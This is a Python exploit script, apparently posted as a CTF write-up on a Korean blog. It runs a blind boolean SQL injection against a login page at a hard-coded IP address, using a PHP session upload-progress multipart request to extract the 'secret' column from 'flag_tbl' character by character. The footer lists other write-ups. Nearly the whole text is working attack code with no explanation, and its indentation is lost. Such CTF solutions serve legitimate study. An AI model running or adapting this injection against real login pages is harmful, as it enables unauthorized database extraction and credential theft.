import requests
result =''
url = 'http://137.117.210.176:13372/'
data = '''------WebKitFormBoundary8Jltb5vw5fWfSYS4
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"
asdfasdfasdf
------WebKitFormBoundary8Jltb5vw5fWfSYS4--'''
headers = {'Cookie' : 'PHPSESSID=yelang123;',
'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundary8Jltb5vw5fWfSYS4'}
for x in range(1,10000):
for i in range(32,128):
payload = "templates/login.php?username=1\"or if(ascii(substr((select group_concat(secret) from flag_tbl),{1},1))={0},1,0)%23&password=tlqkf12a".format(i,x);
r = requests.post(url+payload,headers=headers,data=data)
if "Try again!" not in r.text:
result += chr(i)
print(result)
break;
else:
continue;
print(result)
'WRITEUP' 카테고리의 다른 글
MyBB <= 1.8.22 RCE in Admin Panel (subtitle ninja patch) (0) | 2020.08.15 |
---|---|
[Codegate 2018] Simple CMS Write up (0) | 2018.02.08 |